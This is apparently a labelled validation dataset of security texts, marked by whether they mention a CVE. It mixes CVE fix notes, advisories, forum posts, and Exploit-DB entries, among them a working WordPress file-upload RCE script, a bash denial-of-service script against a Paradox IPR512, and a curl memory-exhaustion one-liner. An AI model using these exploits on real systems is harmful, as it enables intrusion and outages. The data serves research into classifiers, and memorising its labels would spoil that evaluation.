attacker to reuse the admin cookies either via local/network access or by other hypothetical attacks.'}]\n\nFix commit: Call invalidate_all_sessions in prepend_before_action", "source": "cvefixes", "timestamp": "2022-02-10", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "2561d3c72fca0ca2b8eb", "text": "[Allocation of Resources Without Limits or Throttling] CVE-2022-32206: HTTP compression denial of service\n\n## Summary:\nCurl does not prevent resource consumption when processing certain header types, but keeps on allocating more and more resources until the application terminates (or the system crashes, see below).\n\nThe attack vectors include (at least):\n- Sending many `Transfer-Encoding`with repeated encodings such as \"gzip,gzip,gzip,...\"\n- if `CURLOPT_ACCEPT_ENCODING` is set sending many `Content-Encoding` with repeated encodings such as \"gzip,gzip,gzip,...\"\n- Sending many `Set-Cookie` with unique cookie names and about 4kbyte value\n\n## Steps To Reproduce:\n 1.Run the following HTTP server:\n `perl -e 'print \"HTTP/1.1 200 OK\\r\\n\";for (my $i=0; $i < 10000000; $i++) { printf \"Transfer-Encoding: \" . \"gzip,\" x 20000 . \"\\r\\n\"; }' | nc -v -l -p 9999`\n 2. `curl http://localhost:9999`\n\nThe application will terminate when it runs out of memory.\n\nOn macOS the app dies due to OOM:\n```\nKilled: 9\n$ echo $?\n137\n```\n\nOn linux it's the same:\n```\nKilled\n$ echo $?\n137\n```\n\nWhen targeting Windows 11 system the system would stop responding. Once the attack script was terminated the system would not recover after 10 minutes of waiting. While it was possible to log on to the system the display would remain black. Rebooting the system was necessary to recover the system to a working state. This of course is likely due to bugs in the Windows operating system or drivers.\n\nOn other platforms nasty effects may also occur, such as causing extreme swapping or a system crash. Depending on how the system handles the application gobbling all memory it may result in collateral damage, for example when kernel attempts to release system resources by killing processes.\n\n## Impact\n\n- Uncontrolled resource consumption\n- Uncontrolled application termination\n- System crash (on some platforms)", "source": "hackerone", "timestamp": "2022-06-27", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "c2ab5e318d65ea11b99e", "text": "Already after studying it, I achieved my goal. Thanks for a tips am sure they will be helpful to me and other people!", "source": "parrotsec", "timestamp": "2022-02-18", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "9a9b4cc80a20043d06bc", "text": "Yea same here @roguebandit self learning now for 4 years still don’t know anything to be any kind of a threat to real threats but that has to do with memory retention and mold poisoning but anywhoo yea this info was a definite help for sure if I could maybe add a like adage to his question not just for u but anyone who wants to chime in other than basic hacker understanding where would u start with computer in general to give u the better edge asking a network first learning a programming language cause even though I been learning for three years almost four I’m so still light-years from anyreal career in this I feel", "source": "parrotsec", "timestamp": "2022-04-27", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "5ddee50d8e9df416c55e", "text": "me too .But I got the next flag. I entered his backstage and got the next flag, indicating that the backstage can be broken", "source": "hackthebox", "timestamp": "2022-12-15", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "d7b8e1de913974f06ebe", "text": "Got a TP-Link adapter tl-wn722n working perfectly with my pc. Thanks For your help… You can get from here on Amazon .", "source": "parrotsec", "timestamp": "2023-01-19", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "aae15598c36afcbecb29", "text": "Hy everyone, I am at flag5. I have a webshell and try to get a meterpreter revshell using the multi/http/tomcat_mgr_upload moudle, I set username,password, RPORTS, LPORT=8080 but when I start the exploit it gives back this message: image 1925×153 8.57 KB Does somebody know why the server does not return a fingerprint even though it is clearly running under 8080? Btw: does somebody know how to execute msfvenom war payloads on the webserver. Do I just need to click on it? Because I only get a error message and no callback to my multi/handler . image 822×675 52.6 KB image 893×291 25.8 KB", "source": "hackthebox", "timestamp": "2023-12-06", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "f2660650cc4f8c47fb22", "text": "CVE: CVE-2022-2126\n\n[{'lang': 'en', 'value': 'Out-of-bounds Read in GitHub repository vim/vim prior to 8.2.'}]\n\nFix commit: patch 8.2.5123: using invalid index when looking for spell suggestions\n\nProblem: Using invalid index when looking for spell suggestions.\nSolution: Do not decrement the index when it is zero.", "source": "cvefixes", "timestamp": "2022-06-19", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "a7ba74e1b96c5b00a898", "text": "CVE: CVE-2021-23158\n\n[{'lang': 'en', 'value': 'A flaw was found in htmldoc in v1.9.12. Double-free in function pspdf_export(),in ps-pdf.cxx may result in a write-what-where condition, allowing an attacker to execute arbitrary code and denial of service.'}]\n\nFix commit: Fix JPEG error handling (Issue #415)", "source": "cvefixes", "timestamp": "2022-03-16", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "b1c40a467be60d40706c", "text": "im horribly stuck on this also i did setup the loop at 0…27 and the converted base64 has a wordcount of 34071 am i on the right path for that component? when i assign this number to the salt variable and run the script im getting error bad decrypt 140171867060112:error:06065064:digital envelope routines:EVP_DecryptFinal_ex:bad decrypt:evp_enc.c:618: any clues would be great", "source": "hackthebox", "timestamp": "2022-04-13", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "021c25a273ee44f29453", "text": "API for CTF Challenge\n\nCan hack the box be used for a CTF challenge? I want the API to interact with my website and create challenges for various age groups", "source": "hackthebox", "timestamp": "2023-11-17", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "f6e655221da30f1b9864", "text": "File Manager Advanced Shortcode 2.3.2 - Unauthenticated Remote Code Execution (RCE)\n\n# Exploit Title: File Manager Advanced Shortcode 2.3.2 - Unauthenticated Remote Code Execution (RCE)\n# Date: 05/31/2023\n# Exploit Author: Mateus Machado Tesser\n# Vendor Homepage: https://advancedfilemanager.com/\n# Version: File Manager Advanced Shortcode 2.3.2\n# Tested on: Wordpress 6.1 / Linux (Ubuntu) 5.15\n# CVE: CVE-2023-2068\n\nimport requests\nimport json\nimport pprint\nimport sys\nimport re\n\nPROCESS = \"\\033[1;34;40m[*]\\033[0m\"\nSUCCESS = \"\\033[1;32;40m[+]\\033[0m\"\nFAIL = \"\\033[1;31;40m[-]\\033[0m\"\n\ntry:\n\tCOMMAND = sys.argv[2]\n\tIP = sys.argv[1]\n\tif len(COMMAND) > 1:\n\t\tpass\n\tif IP:\n\t\tpass\n\telse:\n\t\tprint(f'Use: {sys.argv[0]} IP COMMAND')\nexcept:\n\tpass\n\nurl = 'http://'+IP+'/' # Path to File Manager Advanced Shortcode Panel\nprint(f\"{PROCESS} Searching fmakey\")\n\ntry:\n\tr = requests.get(url)\n\traw_fmakey = r.text\n\tfmakey = re.findall('_fmakey.*$',raw_fmakey,re.MULTILINE)[0].split(\"'\")[1]\n\tif len(fmakey) == 0:\n\t\tprint(f\"{FAIL} Cannot found fmakey!\")\nexcept:\n\tprint(f\"{FAIL} Cannot found fmakey!\")\n\nprint(f'{PROCESS} Exploiting Unauthenticated Remote Code Execution via AJAX!')\nurl = \"http://\"+IP+\"/wp-admin/admin-ajax.php\"\nheaders = {\"User-Agent\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.102 Safari/537.36\", \"Content-Type\": \"multipart/form-data; boundary=----WebKitFormBoundaryI52DGCOt37rixRS1\", \"Accept\": \"*/*\"}\ndata = \"------WebKitFormBoundaryI52DGCOt37rixRS1\\r\\nContent-Disposition: form-data; name=\\\"reqid\\\"\\r\\n\\r\\n\\r\\n\"\ndata += \"------WebKitFormBoundaryI52DGCOt37rixRS1\\r\\nContent-Disposition: form-data; name=\\\"cmd\\\"\\r\\n\\r\\nupload\\r\\n\"\ndata += \"------WebKitFormBoundaryI52DGCOt37rixRS1\\r\\nContent-Disposition: form-data; name=\\\"target\\\"\\r\\n\\r\\nl1_Lw\\r\\n\"\ndata += \"------WebKitFormBoundaryI52DGCOt37rixRS1\\r\\nContent-Disposition: form-data; name=\\\"hashes[l1_cG5nLWNsaXBhcnQtaGFja2VyLWhhY2tlci5wbmc]\\\"\\r\\n\\r\\nexploit.php\\r\\n\"\ndata += \"------WebKitFormBoundaryI52DGCOt37rixRS1\\r\\nContent-Disposition: form-data; name=\\\"action\\\"\\r\\n\\r\\nfma_load_shortcode_fma_ui\\r\\n\"\ndata += \"------WebKitFormBoundaryI52DGCOt37rixRS1\\r\\nContent-Disposition: form-data; name=\\\"_fmakey\\\"\\r\\n\\r\\n\"+fmakey+\"\\r\\n\"\ndata += \"------WebKitFormBoundaryI52DGCOt37rixRS1\\r\\nContent-Disposition: form-data; name=\\\"path\\\"\\r\\n\\r\\n\\r\\n\"\ndata += \"------WebKitFormBoundaryI52DGCOt37rixRS1\\r\\nContent-Disposition: form-data; name=\\\"url\\\"\\r\\n\\r\\n\\r\\n\"\ndata += \"------WebKitFormBoundaryI52DGCOt37rixRS1\\r\\nContent-Disposition: form-data; name=\\\"w\\\"\\r\\n\\r\\nfalse\\r\\n\"\ndata += \"------WebKitFormBoundaryI52DGCOt37rixRS1\\r\\nContent-Disposition: form-data; name=\\\"r\\\"\\r\\n\\r\\ntrue\\r\\n\"\ndata += \"------WebKitFormBoundaryI52DGCOt37rixRS1\\r\\nContent-Disposition: form-data; name=\\\"hide\\\"\\r\\n\\r\\nplugins\\r\\n\"\ndata += \"------WebKitFormBoundaryI52DGCOt37rixRS1\\r\\nContent-Disposition: form-data; name=\\\"operations\\\"\\r\\n\\r\\nupload,download\\r\\n\"\ndata += \"------WebKitFormBoundaryI52DGCOt37rixRS1\\r\\nContent-Disposition: form-data; name=\\\"path_type\\\"\\r\\n\\r\\ninside\\r\\n\"\ndata += \"------WebKitFormBoundaryI52DGCOt37rixRS1\\r\\nContent-Disposition: form-data; name=\\\"hide_path\\\"\\r\\n\\r\\nno\\r\\n\"\ndata += \"------WebKitFormBoundaryI52DGCOt37rixRS1\\r\\nContent-Disposition: form-data; name=\\\"enable_trash\\\"\\r\\n\\r\\nno\\r\\n\"\ndata += \"------WebKitFormBoundaryI52DGCOt37rixRS1\\r\\nContent-Disposition: form-data; name=\\\"upload_allow\\\"\\r\\n\\r\\ntext/x-php\\r\\n\"\ndata += \"------WebKitFormBoundaryI52DGCOt37rixRS1\\r\\nContent-Disposition: form-data; name=\\\"upload_max_size\\\"\\r\\n\\r\\n2G\\r\\n\"\ndata += \"------WebKitFormBoundaryI52DGCOt37rixRS1\\r\\nContent-Disposition: form-data; name=\\\"upload[]\\\"; filename=\\\"exploit2.php\\\"\\r\\nContent-Type: text/x-php\\r\\n\\r\\n\\r\\n\"\ndata += \"------WebKitFormBoundaryI52DGCOt37rixRS1\\r\\nContent-Disposition: form-data; name=\\\"mtime[]\\\"\\r\\n\\r\\n\\r\\n------WebKitFormBoundaryI52DGCOt37rixRS1--\\r\\n\"\nr = requests.post(url, headers=headers, data=data)\nprint(f\"{PROCESS} Sending AJAX request to: {url}\")\nif 'errUploadMime' in r.text:\n\tprint(f'{FAIL} Exploit failed!')\n\tsys.ex", "source": "exploitdb", "timestamp": "2023-06-04", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "6e447be7cd4d41e1dd39", "text": "LOL, what a Dumbo I am. Several days stuck with the task…just because I did not understand the task properly. So, save your time if you are stuck too. Disassemble, loop, iterate through RDX and save all results of the looping…and then just delete 0x and join the bytes together. No switching around. Just load it, run it and you will see the value you are looking for. Its straigthforward, not a trap.", "source": "hackthebox", "timestamp": "2023-11-18", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "c59f987106fc6f0b945f", "text": "CVE: CVE-2022-34035\n\n[{'lang': 'en', 'value': 'HTMLDoc v1.9.12 and below was discovered to contain a heap overflow via e_node htmldoc/htmldoc/html.cxx:588.'}]\n\nFix commit: Fix a crash bug with bogus text (Issue #426)", "source": "cvefixes", "timestamp": "2022-07-18", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "08b1e92a50756d283609", "text": "Paradox Security Systems IPR512 - Denial Of Service\n\n#!/bin/bash\n\n# Exploit Title: Paradox Security Systems IPR512 - Denial Of Service\n# Google Dork: intitle:\"ipr512 * - login screen\"\n# Date: 09-APR-2023\n# Exploit Author: Giorgi Dograshvili\n# Vendor Homepage: Paradox - Headquarters (https://www.paradox.com/Products/default.asp?PID=423)\n# Version: IPR512\n# CVE : CVE-2023-24709\n\n# Function to display banner message\ndisplay_banner() {\n echo \"******************************************************\"\n echo \"* *\"\n echo \"* PoC CVE-2023-24709 *\"\n echo \"* BE AWARE!!! RUNNING THE SCRIPT WILL MAKE *\"\n echo \"* A DAMAGING IMPACT ON THE SERVICE FUNCTIONING! *\"\n echo \"* by SlashXzerozero *\"\n echo \"* *\"\n echo \"******************************************************\"\n}\n\n# Call the function to display the banner\ndisplay_banner\n echo \"\"\n echo \"\"\n echo \"Please enter a domain name or IP address with or without port\"\nread -p \"(e.g. example.net or 192.168.12.34, or 192.168.56.78:999): \" domain\n\n# Step 2: Ask for user confirmation\nread -p \"This will DAMAGE the service. Do you still want it to proceed? (Y/n): \" confirm\nif [[ $confirm == \"Y\" || $confirm == \"y\" ]]; then\n # Display loading animation\n animation=(\"|\" \"/\" \"-\" \"\\\\\")\n index=0\n while [[ $index -lt 10 ]]; do\n echo -ne \"Loading ${animation[index]} \\r\"\n sleep 1\n index=$((index + 1))\n done\n\n # Use curl to send HTTP GET request with custom headers and timeout\n response=$(curl -i -s -k -X GET \\\n -H \"Host: $domain\" \\\n -H \"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.5563.111 Safari/537.36\" \\\n -H \"Accept: */\" \\\n -H \"Referer: http://$domain/login.html\" \\\n -H \"Accept-Encoding: gzip, deflate\" \\\n -H \"Accept-Language: en-US,en;q=0.9\" \\\n -H \"Connection: close\" \\\n --max-time 10 \\\n \"http://$domain/login.cgi?log_user=%3c%2f%73%63%72%69%70%74%3e&log_passmd5=&r=3982\")\n\n # Check response for HTTP status code 200 and print result\n if [[ $response == *\"HTTP/1.1 200 OK\"* ]]; then\n echo -e \"\\nIt seems to be vulnerable! Please check the webpanel: http://$domain/login.html\"\n else\n echo -e \"\\nShouldn't be vulnerable! Please check the webpanel: http://$domain/login.html\"\n fi\nelse\n echo \"The script is stopped!.\"\nfi", "source": "exploitdb", "timestamp": "2023-04-10", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "afa7d3f17ffa9736cce0", "text": "CVE: CVE-2022-31112\n\n[{'lang': 'en', 'value': 'Parse Server is an open source backend that can be deployed to any infrastructure that can run Node.js. In affected versions parse Server LiveQuery does not remove protected fields in classes, passing them to the client. The LiveQueryController now removes protected fields from the client response. Users are advised to upgrade. Users unable t upgrade should use `Parse.Cloud.afterLiveQueryEvent` to manually remove protected fields.'}]\n\nFix commit: fix: protected fields exposed via LiveQuery (GHSA-crrq-vr9j-fxxh) [skip release] (#8076)", "source": "cvefixes", "timestamp": "2022-06-30", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "661b84b6a54200f2e8f1", "text": "Exploiting File Upload Vulnerability for images embedded as src=\"data:image/jpeg;base64\"\n\nHi there, every now and then I stumble over web apps that are based on JavaScript / JSON frameworks. There is a functionality to upload images, which I can bypass to upload a shell or other file types. However, when displaying the image via the web app, the image is embedded usually in the following way: Do you see any way to exploit this anyway? So far, I have been capturing the HTTP requests to check from which directory the file has been pulled from and try to access the file directly from there.", "source": "hackersploit", "timestamp": "2022-12-03", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "5ed3192f4931f86b53b7", "text": "SSLKEYLOGFILE\n\nAm trying to log the SSLKEYLOGFILE on parort security os can anyone direct me on how to do that ? Thanks", "source": "parrotsec", "timestamp": "2023-05-10", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "c20f877e43d34ac6ba17", "text": "Screen Reader\n\nparrot_screen_reader_logo 690×500 14.3 KB When it comes to an offline Screen Reader there are options on Parrot like Orca or Festival , which are Accessibility-focused but normally this type of software is pointed towards usability -and over-complicated extensibility- more than voice quality, in this case we aim to a more Natural Voice , so articles, emails or chats can be heard without a so robotic tone. 1. Dependency Installs apt install libmp3-info-perl libmp3-tag-perl libsox-fmt-mp3 libunicode-string-perl sox xsel mpg321 python3-pip 2. gTTS Install This is why you require pip (Python Package Installer) also gTTS (Google Text-to-Speech), library and CLI tool to interface with Google Translate’s text-to-speech API, that’s what makes most of the job. pip install gTTS 3. Execution Scripts There are two ways to do this, the Manual way and the Manuel way. “Manual” Way CLI-ready, Select, Execute : Select a text placed anywhere on your desktop, xsel will pipeline the order on the CLI and you’ll hear the voice reading. English Voice xsel | gtts-cli --nocheck - | mpg321 - Spanish Voice xsel | gtts-cli --nocheck --lang es - | mpg321 - “Manuel” Way Just create a keyboard shortcut or keybinding: Parrot comes with MATE so you can just Add another one to the existing list, it’ll do the same work. Bind the command to a key combination e.g., Ctrl + Shift + R . English Voice bash -c \"xsel | gtts-cli --nocheck - | mpg321 -\" Spanish Voice bash -c \"xsel | gtts-cli --nocheck --lang es - | mpg321 -\" What’s next? Well, I would say being able to control the playing, like pause and resume functions, a GUI maybe? However, if you know an existing implementation (or have made one) for such things you can PM me anytime here or over the Telegram groups and make great things with this one.", "source": "parrotsec", "timestamp": "2022-04-10", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "7bee6e2974fb0b37cc6e", "text": "You need to format the pen-drive to X Fats [it has more capabilities than fats 32] the SHA sum is given on the download page before you hit the button try Balena etcher not Rufus the age, previous use and quality of the pen-drive can all affect its performance, I always recommend a good quality branded one preferably not exceeding 16gb cheap ones are fine for storage but often give trouble as a bootable ISO. you will find a link explaining how to check your SHA halfway down my how do I guide Linux Tips – 26 Jan 22 How Do I Install Linux (A General Guide) • Linux Tips Today, I will try to answer one of the most common questions asked by the newcomer to Linux; “How do I install Linux” Est. reading time: 5 minutes", "source": "parrotsec", "timestamp": "2023-01-22", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "92b89f4d6cbaafdec46f", "text": "CVE: CVE-2022-21740\n\n[{'lang': 'en', 'value': 'Tensorflow is an Open Source Machine Learning Framework. The implementation of `SparseCountSparseOutput` is vulnerable to a heap overflow. The fix will be included in TensorFlow 2.8.0. We will also cherrypick this commit on TensorFlow 2.7.1, TensorFlow 2.6.3, and TensorFlow 2.5.3, as these are also affected and still in supported range.'}]\n\nFix commit: Further validate sparse tensor for `SparseCount`: indices must be valid within dense shape.\n\nPiperOrigin-RevId: 414888122\nChange-Id: I4552bd74c135ecd4bcb5448acc0a3ce9402d8286", "source": "cvefixes", "timestamp": "2022-02-03", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "383c217ad34a637f16fb", "text": "Hello. It’s not about ParrotOS as you are talking about a hardware component, however no, it’s nothing weird, you just bought a plug-and-play adapter (the drivers should already be installed in the distro). I would suggest you to better read the technical specifications of this wifi adapter.", "source": "parrotsec", "timestamp": "2022-02-21", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "5d07a38ed75cd1cb6a2c", "text": "heck cybrary.it, opensecuritytraining.info And then check Offensive Computer Security on hackallthethings also", "source": "parrotsec", "timestamp": "2022-03-02", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "4adec1caf1080d363d5c", "text": "OpenStack Glance Denial of service by creating a large number of images\n\n[Severity: HIGH]\n\nOpenStack Image Registry and Delivery Service (Glance) 2014.2 through 2014.2.2 does not properly remove images, which allows remote authenticated users to cause a denial of service (disk consumption) by creating a large number of images using the task v2 API and then deleting them before the uploads finish, a different vulnerability than CVE-2015-1881.", "source": "github_advisory", "timestamp": "2022-05-17", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "aba82ac2277c82b4d920", "text": "Hi, You have to find a Command Injection Method (||), from there t’r’y different bypass methods. Using and bypass method for / should work.", "source": "hackthebox", "timestamp": "2022-08-20", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "6a6d74202484380385db", "text": "ChakraCore RCE Vulnerability\n\n[Severity: HIGH]\n\nA remote code execution vulnerability exists in the way that the Chakra scripting engine handles objects in memory in Microsoft Edge, aka \"Chakra Scripting Engine Memory Corruption Vulnerability.\" This affects Microsoft Edge, ChakraCore. This CVE ID is unique from CVE-2018-8503, CVE-2018-8510, CVE-2018-8511, CVE-2018-8513.", "source": "github_advisory", "timestamp": "2022-05-13", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "5af85a1d3685a0d5b928", "text": "Hey @Rapunzel3000 were you able to figure this out? I am also stuck on trying to use the rockyou-30 wordlist. I tried cleaning up the wordlist but no luck so far due to not having the permissions to use sed", "source": "hackthebox", "timestamp": "2022-01-15", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "75163069f88bac0378f4", "text": "CVE: CVE-2022-31084\n\n[{'lang': 'en', 'value': 'LDAP Account Manager (LAM) is a webfrontend for managing entries (e.g. users, groups, DHCP settings) stored in an LDAP directory. In versions prior to 8.0 There are cases where LAM instantiates objects from arbitrary classes. An attacker can inject the first constructor argument. This can lead to code execution if non-LAM classes are instantiated that execute code during object creation. This issue has been fixed in version 8.0.'}]\n\nFix commit: Merge pull request from GHSA-r387-grjx-qgvw\n\nFixes", "source": "cvefixes", "timestamp": "2022-06-27", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "0e274e63c3f74acf74df", "text": "CVE: CVE-2022-29200\n\n[{'lang': 'en', 'value': 'TensorFlow is an open source platform for machine learning. Prior to versions 2.9.0, 2.8.1, 2.7.2, and 2.6.4, the implementation of `tf.raw_ops.LSTMBlockCell` does not fully validate the input arguments. This results in a `CHECK`-failure which can be used to trigger a denial of service attack. The code does not validate the ranks of any of the arguments to this API call. This results in `CHECK`-failures when the elements of the tensor are accessed. Versions 2.9.0, 2.8.1, 2.7.2, and 2.6.4 contain a patch for this issue.'}]\n\nFix commit: Fix security vulnerability with LSTMBlockCellOp\n\nPiperOrigin-RevId: 446028341", "source": "cvefixes", "timestamp": "2022-05-20", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "9acbe1933b87da6e9fe2", "text": "I am a hardware man not a hacker, from my point of view TP-Link products are pretty good, the only possible problem is you may need an alternative web connection to download any chip specific drivers, TP use Realtek chipsets", "source": "parrotsec", "timestamp": "2022-12-04", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "6880bc9c2b1acc8df97a", "text": "Authlogic Information Exposure vulnerability\n\n[Severity: MEDIUM]\n\nThe Authlogic gem for Ruby on Rails prior to version 3.3.0 makes potentially unsafe `find_by_id` method calls, which might allow remote attackers to conduct CVE-2012-6496 SQL injection attacks via a crafted parameter in environments that have a known secret_token value, as demonstrated by a value contained in `secret_token.rb` in an open-source product.", "source": "github_advisory", "timestamp": "2022-05-14", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "2624a53a88e537a75c91", "text": "How can you make the shell script run up when parrot operation system boot up?\n\nI want to run a shell script when parrot boot,but I went through all about how to get the shell script boot to run automatically and still have no clue.", "source": "parrotsec", "timestamp": "2023-08-18", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "113353a1dd49225428ce", "text": "CVE: CVE-2022-0326\n\n[{'lang': 'en', 'value': 'NULL Pointer Dereference in Homebrew mruby prior to 3.2.'}]\n\nFix commit: codegen.c: no `OP_HASHADD` required when `val` is false.", "source": "cvefixes", "timestamp": "2022-01-21", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "82afd14a0b8909518eab", "text": "Empire error on running\n\ni have this error ──╼ $./empire File “/home/karbar/Empire/./empire”, line 35 print ‘[ ] Fresh start in docker, running reset.sh for you’ ^ SyntaxError: Missing parentheses in call to ‘print’. Did you mean print(’[ ] Fresh start in docker, running reset.sh for you’)?", "source": "parrotsec", "timestamp": "2022-03-28", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "1e0737eb43015da46f65", "text": "2 years Cyberbullying on Insta - Help!\n\nHey All, I need help! My partner has been cyber-bullied, defamed and harassed by a random person on several fake Instagram accounts for the past 2 years. We are from a religious family so it is upsetting what rumours they have been spreading around my/her extended family/friends' and public posts. If you can help me locate this person so I can stop them, it would seriously change mine and her life. I have screenshots of some account names on public posts - they seem to deactivate the accounts then re-activate when they want to attack. Thank you for taking the time to read this. I hope there is help! Kind Regards", "source": "go4expert", "timestamp": "2022-02-16", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "aeddab44b9fe29a7ee7e", "text": "CVE: CVE-2022-1767\n\n[{'lang': 'en', 'value': 'Server-Side Request Forgery (SSRF) in GitHub repository jgraph/drawio prior to 18.0.7.'}]\n\nFix commit: 18.0.7 release", "source": "cvefixes", "timestamp": "2022-05-18", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "34072233ff4fee546d6c", "text": "CVE: CVE-2022-25854\n\n[{'lang': 'en', 'value': 'This affects the package @yaireo/tagify before 4.9.8. The package is used for rendering UI components inside the input or text fields, and an attacker can pass a malicious placeholder value to it to fire the XSS payload.'}]\n\nFix commit: fixes #989 - fix XSS", "source": "cvefixes", "timestamp": "2022-04-29", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "45deeb9055cde8e3d9b0", "text": "This topic was automatically closed 120 days after the last reply. New replies are no longer allowed.", "source": "parrotsec", "timestamp": "2023-03-05", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "b1d77f9f213b3f016d69", "text": "CVE: CVE-2021-25981\n\n[{'lang': 'en', 'value': 'In Talkyard, regular versions v0.2021.20 through v0.2021.33 and dev versions v0.2021.20 through v0.2021.34, are vulnerable to Insufficient Session Expiration. This may allow an attacker to reuse the admin’s still-valid session token even when logged-out, to gain admin privileges, given the attacker is able to obtain that token (via other, hypothetical attacks)'}]\n\nFix commit: Better session ids, 5 parts, feature flag to enable.", "source": "cvefixes", "timestamp": "2022-01-03", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "555f8ad441439d69ad7c", "text": "CVE: CVE-2022-0822\n\n[{'lang': 'en', 'value': 'Cross-site Scripting (XSS) - Reflected in GitHub repository orchardcms/orchardcore prior to 1.3.0.'}]\n\nFix commit: Fix missing permission checks and encoding. (#11344)", "source": "cvefixes", "timestamp": "2022-03-11", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "0a2a71ccc2f150c43da7", "text": "I don’t know if this is still relevant, but you should think where you could else use the found credentials.", "source": "hackthebox", "timestamp": "2023-08-19", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "8cba5f0786e3c4de7d82", "text": "CVE: CVE-2022-1988\n\n[{'lang': 'en', 'value': 'Cross-site Scripting (XSS) - Generic in GitHub repository neorazorx/facturascripts prior to 2022.09.'}]\n\nFix commit: - Añadida comprobación de html en descripción al test unitario del modelo cuenta.\n- Eliminado el test unitario de subcuenta por obsoleto. Se creará uno nuevo a continuación.", "source": "cvefixes", "timestamp": "2022-06-03", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "0cc67b6ce28568d4bf30", "text": "I do not want to spoil here. You can DM me if you still need help.", "source": "hackthebox", "timestamp": "2022-02-23", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "f5555e94ad5a528f979e", "text": "ChakraCore RCE Vulnerability\n\n[Severity: HIGH]\n\nA remote code execution vulnerability exists in the way that the Chakra scripting engine handles objects in memory in Microsoft Edge, aka \"Chakra Scripting Engine Memory Corruption Vulnerability.\" This affects Microsoft Edge, ChakraCore. This CVE ID is unique from CVE-2018-8280, CVE-2018-8286, CVE-2018-8294.", "source": "github_advisory", "timestamp": "2022-05-13", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "c909ebf68a21a9316b41", "text": "JWS and JWT signature validation vulnerability with special characters\n\n[Severity: HIGH]\n\n### Impact\n\nJsrsasign supports JWS(JSON Web Signatures) and JWT(JSON Web Token) validation. However JWS or JWT signature with non Base64URL encoding special characters or number escaped characters may be validated as valid by mistake.\n\nFor example, even if a string of non Base64URL encoding characters such as `!@$%` or `\\11` is inserted into a valid JWS or JWT signature value string, it will still be a valid JWS or JWT signature by mistake.\n\nWhen jsrsasign's JWS or JWT validation is used in OpenID connect or OAuth2, this vulnerability will affect to authentication or authorization.\n\nBy our internal assessment, CVSS 3.1 score will be 8.6.\nCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:H/A:N\n\n### Patches\nUsers validate JWS or JWT signatures should upgrade to 10.5.25.\n\n### Workarounds\nValidate JWS or JWT signature if it has Base64URL and dot safe string before\nexecuting JWS.verify() or JWS.verifyJWT() method.\n\n### ACKNOWLEDGEMENT\n\nThanks to Adi Malyanker and Or David for this vulnerability report. Also thanks for [Snyk security team](https://snyk.io/) for this coordination.\n\n### References\nhttps://github.com/kjur/jsrsasign/releases/tag/10.5.25\nhttps://github.com/kjur/jsrsasign/security/advisories/GHSA-3fvg-4v2m-98jf kjur's advisories\nhttps://github.com/advisories/GHSA-3fvg-4v2m-98jf github advisories\nhttps://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-25898\nhttps://kjur.github.io/jsrsasign/api/symbols/KJUR.jws.JWS.html#.verifyJWT\nhttps://kjur.github.io/jsrsasign/api/symbols/KJUR.jws.JWS.html#.verify\nhttps://kjur.github.io/jsrsasign/api/symbols/global__.html#.isBase64URLDot\nhttps://github.com/kjur/jsrsasign/wiki/Tutorial-for-JWS-verification\nhttps://github.com/kjur/jsrsasign/wiki/Tutorial-for-JWT-verification\nhttps://security.snyk.io/vuln/SNYK-JS-JSRSASIGN-2869122\n", "source": "github_advisory", "timestamp": "2022-06-25", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} 